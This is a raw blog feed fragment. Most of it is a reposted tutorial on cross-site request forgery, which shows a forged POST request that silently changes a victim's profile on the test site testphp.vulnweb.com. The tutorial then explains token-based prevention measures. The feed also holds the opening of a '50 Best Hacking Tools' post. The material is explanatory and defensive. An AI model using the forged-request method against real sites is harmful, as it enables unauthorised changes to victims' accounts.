&lt;img alt=&quot;Example victim of CSRF attack&quot; class=&quot;aligncenter size-full wp-image-8864&quot; height=&quot;322&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/04/acx4.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF&quot; width=&quot;396&quot; /&gt;&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;As soon as the victim visits the myimages.php page, the hidden&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;iframe&lt;/code&gt;&amp;nbsp;is loaded executing the CSRF attack. Below is the HTTP POST request which is made when the victim accesses the attacker’s malicious&amp;nbsp;&lt;kbd style=&quot;background-color: #e7e7e7; border-radius: 3px; box-shadow: rgba(0, 0, 0, 0.247059) 0px -1px 0px inset; box-sizing: border-box; color: #4d4d4d; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;/myimages.php&lt;/kbd&gt;&amp;nbsp;page.&lt;/div&gt;
&lt;pre style=&quot;background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; outline: 0px !important; overflow: auto; padding: 9.5px; word-break: break-all; word-wrap: break-word;&quot;&gt;&lt;code class=&quot; hljs http&quot; style=&quot;background: rgb(248, 248, 248); border-radius: 0px; box-sizing: border-box; display: block; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: inherit; outline: 0px !important; overflow-x: auto; padding: 0.5em; white-space: pre-wrap;&quot;&gt;&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Host&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;testphp.vulnweb.com&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Connection&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;keep-alive&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Content-Length&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;140&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Cache-Control&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;max-age=0&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Origin&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;http://www.vulnweb.com&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;User-Agent&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Content-Type&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;application/x-www-form-urlencoded&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Accept&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Referer&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;http://www.vulnweb.com/updateif.php&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Accept-Encoding&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;gzip,deflate,sdch&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Accept-Language&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;en-GB,en-US;q=0.8,en;q=0.6&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Accept-Charset&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;ISO-8859-1,utf-8;q=0.7,*;q=0.3&lt;/span&gt;
&lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;Cookie&lt;/span&gt;: &lt;span class=&quot;hljs-string&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;login=acuart%2Facuart&lt;/span&gt;

&lt;span class=&quot;perl&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;urname=h4xor&amp;amp;ucc=&lt;span class=&quot;hljs-number&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;1111&lt;/span&gt;-&lt;span class=&quot;hljs-number&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;2222&lt;/span&gt;-&lt;span class=&quot;hljs-number&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;3333&lt;/span&gt;-&lt;span class=&quot;hljs-number&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;4444&lt;/span&gt;&amp;amp;uemail=spam&lt;span class=&quot;hljs-variable&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;%40myspam&lt;/span&gt;.com&amp;amp;uphone=&lt;span class=&quot;hljs-variable&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;%2B800&lt;/span&gt;+&lt;span class=&quot;hljs-number&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;666&lt;/span&gt;+&lt;span class=&quot;hljs-number&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;666&lt;/span&gt;+&lt;span class=&quot;hljs-number&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;666&lt;/span&gt;&amp;amp;uaddress=Hacking+the+universe&lt;span class=&quot;hljs-variable&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;%21&lt;/span&gt;&lt;span class=&quot;hljs-variable&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;%21&lt;/span&gt;&lt;span class=&quot;hljs-variable&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;%21&lt;/span&gt;&amp;amp;update=update&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The above HTTP POST request shows that the Host to which the POST request is sent is testphp.vulnweb.com but the origin is www.vulnweb.com with a referrer being the updateif.php page of the attackers website. Moreover, the Cookie information is included in the POST request which is the first requirement in order for the POST request to be authenticated and the CSRF to be realized. Finally, the parameters information is included in the POST request and will be submitted to the target website.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
When the POST request is made the browser already has the authentication session for the target website and it includes the authentication details in the POST request as it should do in any other legitimate POST request made by the victim. This particular rogue POST request is exactly the same as a legitimate POST request with the same Host target but from a different origin. The browser, as normal, sends the POST request and the server (in this case) is not able to differentiate between a legitimate and rogue POST request since both are performed by the trusted browser in the same way.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
There is not any information included in the POST request (such as a token value, seen later) which will help the server to validate a POST request as not malicious. This results in the server processing both POST requests in the normal way.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
&lt;img alt=&quot;Example victim of CSRF attack&quot; class=&quot;aligncenter size-full wp-image-8865&quot; height=&quot;321&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/04/acx5.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF&quot; width=&quot;365&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
From the above image you can notice that the profile information of the victim on the target website has been changed.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The rogue information was submitted and successfully updated the victim’s profile on the target website. The victim has no indication of what happened since this operation is transparent to the user. The attacker has completed his attack successfully in this scenario. In another scenario an attacker could change the admin passwords, perform illegal transactions, and more.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
NOTE: The particular operation will be performed for any user that accesses the attacker’s website. In case the particular user has an account in the target website and is logged in, then the user’s profile information will be updated with the ones of the attacker. For this particular example, we assumed that there were no security measures in place that might block the CSRF attack.&lt;/div&gt;
&lt;/div&gt;
&lt;/h1&gt;
&lt;h2 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 21px; font-weight: 400; line-height: 1.1; margin-bottom: 10px; margin-top: 20px; outline: 0px !important;&quot;&gt;
Prevention Measures&lt;/h2&gt;
&lt;h1 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 42px; font-weight: 500; line-height: 1.1; margin: 20px 0px 10px; outline: 0px !important;&quot;&gt;
&lt;div class=&quot;entry-content&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: &#39;Open Sans&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; outline: 0px !important;&quot;&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
There are many suggested prevention measures that can be implemented to mitigate CSRF attacks. Some of them, though, are not complete solutions and leave room for the attack to still work. For example:&lt;/div&gt;
&lt;ul style=&quot;box-sizing: border-box; margin-bottom: 10px; margin-top: 0px; outline: 0px !important; padding-left: 20px;&quot;&gt;
&lt;li style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;The use of a secret cookie – This method will not work because all cookies related to the target website will be submitted as usual as in a normal (legitimate) HTTP request.&lt;/li&gt;
&lt;li style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;Accept POST requests only – This suggestion falls short because attackers can deceive an end-user to submit a forged POST request unknowingly using social engineering methods.&lt;/li&gt;
&lt;li style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;URL Rewriting – An incomplete solution since some session information is included or exposed in the URL.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Let’s take a look at some measures that do actually mitigate a CSRF attack.&lt;/div&gt;
&lt;/div&gt;
&lt;/h1&gt;
&lt;h2 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 21px; font-weight: 400; line-height: 1.1; margin-bottom: 10px; margin-top: 20px; outline: 0px !important;&quot;&gt;
Use of Tokens&lt;/h2&gt;
&lt;h1 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 42px; font-weight: 500; line-height: 1.1; margin: 20px 0px 10px; outline: 0px !important;&quot;&gt;
&lt;div class=&quot;entry-content&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: &#39;Open Sans&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; outline: 0px !important;&quot;&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
A prevention measure could be the implementation and inclusion of tokens in a user’s (current) session. Tokens are long cryptographic values that are difficult to guess. These will be generated when a user’s session begins and will be associated with this particular user’s session. This challenge token will be included in each request, which will be used by the server side to verify the legitimacy of the end-user’s request.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
In order for an attacker to forge a HTTP request, they would have to know the particular challenge value (token) of the victim’s session. The disclosure of the challenge token in the URL (GET requests) should be done wisely and with awareness of the CSRF attack.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Challenge tokens can be used in the ViewState option of the ASP.NET. Since it is possible for an attacker to obtain or guess the parameter values of a ViewState then the inclusion and use of a token can make the ViewState unique and protected to CSRF attacks.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Moreover, tokens can be used in the submission of double cookies. The server-side will generate a strong random value which will be included in the submitted cookie on the user’s machine. This will act as the session ID. On sending a POST request, the website will require the particular session ID to be included as a hidden value in the submission form and be included in the cookie as well. If the two values are the same, the POST request will be considered as valid and submitted successfully. Therefore, even if the attacker is able to include any value in the form, based on the same-origin policy, the attacker will not be able to retrieve or modify the token value in the cookie and launch a CSRF attack unless they manage to guess the session ID value.&lt;/div&gt;
&lt;/div&gt;
&lt;/h1&gt;
&lt;h2 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 21px; font-weight: 400; line-height: 1.1; margin-bottom: 10px; margin-top: 20px; outline: 0px !important;&quot;&gt;
Other Security Measures&lt;/h2&gt;
&lt;h1 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 42px; font-weight: 500; line-height: 1.1; margin: 20px 0px 10px; outline: 0px !important;&quot;&gt;
&lt;div class=&quot;entry-content&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: &#39;Open Sans&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; outline: 0px !important;&quot;&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Another prevention measure is the use of challenge-response options. Despite the fact that this measure affects the user experience, it can strongly defend against CSRF attacks.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Furthermore, users should be made aware of potential threats. For example, users should:&lt;/div&gt;
&lt;ul style=&quot;box-sizing: border-box; margin-bottom: 10px; margin-top: 0px; outline: 0px !important; padding-left: 20px;&quot;&gt;
&lt;li style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;Log out from web applications when they have finished using them.&lt;/li&gt;
&lt;li style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;Use the web browser with safety – that means making sure not to save any login credentials on the web browser and using legitimate and secure browser extensions.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Finally, you should scan your website using a web vulnerability scanner to detect any Cross-Site Request Forgery vulnerabilities so you can fix them before they cause any issues.&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;&lt;img alt=&quot;Example victim of CSRF attack&quot; class=&quot;aligncenter size-full wp-image-8866&quot; height=&quot;309&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/04/acx6.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF&quot; width=&quot;577&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Acunetix Web Vulnerability Scanner will crawl your website, detect any CSRF vulnerabilities and alert you if any are found. It also provides you with a detailed description of weakness and the exact location your website is vulnerable, and gives you a detailed explanation on how to solve it. Make sure your website is secure by&lt;a href=&quot;http://www.acunetix.com/cross-site-scripting/scanner-download/&quot; style=&quot;background: transparent; box-sizing: border-box; color: #e31e25; outline: 0px !important; text-decoration: none; transition: all 0.2s ease-in;&quot;&gt;downloading the trial version of Acunetix Web Vulnerability Scanner&lt;/a&gt;.&lt;/div&gt;
&lt;/div&gt;
&lt;/h1&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/8379347440200141969/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2016/01/leaving-your-websites-open-to-attack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/8379347440200141969'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/8379347440200141969'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2016/01/leaving-your-websites-open-to-attack.html' title='Leaving your websites open to attack?'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-7653032314889782781</id><published>2015-12-01T07:24:00.002-08:00</published><updated>2015-12-01T07:24:27.245-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><title type='text'>Who are Hackers</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfKXMPTnQyJDAgdSvMeucEFeMwggsoy-9mc6mfBwP7EOrlPwJqMnQP8g21lNAQ7sww3iN_tayJZI7VUYl7ys_4yZWYzsIb5_l2GlS7lq755E1RrglwKjLfbftUuzedO-fYyE2VopihIT8/s1600/hacker.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfKXMPTnQyJDAgdSvMeucEFeMwggsoy-9mc6mfBwP7EOrlPwJqMnQP8g21lNAQ7sww3iN_tayJZI7VUYl7ys_4yZWYzsIb5_l2GlS7lq755E1RrglwKjLfbftUuzedO-fYyE2VopihIT8/s640/hacker.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/7653032314889782781/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2015/12/who-are-hackers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/7653032314889782781'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/7653032314889782781'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2015/12/who-are-hackers.html' title='Who are Hackers'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfKXMPTnQyJDAgdSvMeucEFeMwggsoy-9mc6mfBwP7EOrlPwJqMnQP8g21lNAQ7sww3iN_tayJZI7VUYl7ys_4yZWYzsIb5_l2GlS7lq755E1RrglwKjLfbftUuzedO-fYyE2VopihIT8/s72-c/hacker.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-467384333297952070</id><published>2015-12-01T07:15:00.000-08:00</published><updated>2015-12-01T07:15:21.893-08:00</updated><title type='text'>50 Best Hacking Tools!   </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoNormalTable&quot; style=&quot;background: white; mso-cellspacing: 0cm; mso-padding-alt: 0cm 0cm 0cm 0cm; mso-yfti-tbllook: 1184; width: 100%px;&quot;&gt;
 &lt;tbody&gt;
&lt;tr style=&quot;height: 22.5pt; mso-yfti-firstrow: yes; mso-yfti-irow: 0;&quot;&gt;
  &lt;td style=&quot;border-bottom: solid #8F0000 1.5pt; border: none; height: 22.5pt; padding: 0cm 0cm 0cm 0cm;&quot;&gt;
  &lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #8f0000; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;50 Best Hacking
  Tools!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: #808285; font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;padding: 0cm 0cm 0cm 0cm;&quot;&gt;
  &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoNormalTable&quot; style=&quot;mso-cellspacing: 0cm; mso-padding-alt: 0cm 0cm 0cm 0cm; mso-yfti-tbllook: 1184; width: 100%px;&quot;&gt;
   &lt;tbody&gt;
&lt;tr&gt;
    &lt;td style=&quot;padding: 0cm 0cm 0cm 0cm;&quot;&gt;
    &lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/td&gt;
   &lt;/tr&gt;
&lt;tr&gt;
    &lt;td style=&quot;padding: 0cm 0cm 0cm 0cm;&quot;&gt;
    &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoNormalTable&quot; style=&quot;mso-cellspacing: 0cm; mso-padding-alt: 0cm 0cm 0cm 0cm; mso-yfti-tbllook: 1184; width: 100%px;&quot;&gt;
     &lt;tbody&gt;
&lt;tr&gt;
      &lt;td style=&quot;padding: 0cm 0cm 0cm 0cm; width: 95.0%;&quot; valign=&quot;top&quot; width=&quot;95%&quot;&gt;
      &lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;Hacking
      tools can be dangerous in the wrong hands. But, they can be just as
      useful for a good ethical hacker too!&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
      &lt;td style=&quot;padding: 0cm 0cm 0cm 0cm; width: 2.0%;&quot; valign=&quot;top&quot; width=&quot;2%&quot;&gt;
      &lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/td&gt;
      &lt;td style=&quot;padding: 0cm 0cm 0cm 0cm; width: 23.0%;&quot; valign=&quot;top&quot; width=&quot;23%&quot;&gt;&lt;/td&gt;
     &lt;/tr&gt;
&lt;tr&gt;
      &lt;td colspan=&quot;3&quot; style=&quot;padding: 0cm 0cm 0cm 0cm;&quot;&gt;&lt;/td&gt;
     &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;
   &lt;/tr&gt;
&lt;tr&gt;
    &lt;td style=&quot;padding: 0cm 0cm 0cm 0cm;&quot;&gt;
    &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; class=&quot;MsoNormalTable&quot;&gt;
     &lt;tbody&gt;
&lt;tr&gt;
      &lt;td style=&quot;padding: .75pt .75pt .75pt .75pt;&quot; valign=&quot;top&quot;&gt;
      &lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 12pt;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuXpPFeuy_YOVW-ThnKz9lA7b9fxdCcuwF3G1ezqxH5PI5qr_b81L_dRk2Jl0q_r7_pJbV0DYIEk7NqlFmigVIOVJHPvj6xoiP3lqtRvzwF-zM0YZBcQkU146j-TGEEDmCSL9Nb44eZjQ/s1600/hack+tools.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuXpPFeuy_YOVW-ThnKz9lA7b9fxdCcuwF3G1ezqxH5PI5qr_b81L_dRk2Jl0q_r7_pJbV0DYIEk7NqlFmigVIOVJHPvj6xoiP3lqtRvzwF-zM0YZBcQkU146j-TGEEDmCSL9Nb44eZjQ/s320/hack+tools.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;Hacking
      tools have been said to make hacking quite easy as compared to the old
      days. But, there is still more to being a hacker than just that. Yes,
      these tools have made it simple, but that is nothing unless you have the
      knowledge about other aspects of hacking as well. We present tp you a set
      of must-have hacking tools.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
      &lt;td style=&quot;padding: .75pt .75pt .75pt .75pt;&quot; valign=&quot;top&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 12pt;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Open Sans&#39;, sans-serif;&quot;&gt;Wireless Hacking:&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Open Sans&#39;, sans-serif;&quot;&gt;&amp;nbsp;These are tools that help you hack into wireless
    networks. Wireless hacking tools though useful, do not make you a complete
    hacker. In order to achieve that, you must learn the different ways in
    which a secure network can be accessed. Also, you should work on making
    your own network as secure as possible.&lt;/span&gt;&lt;/div&gt;
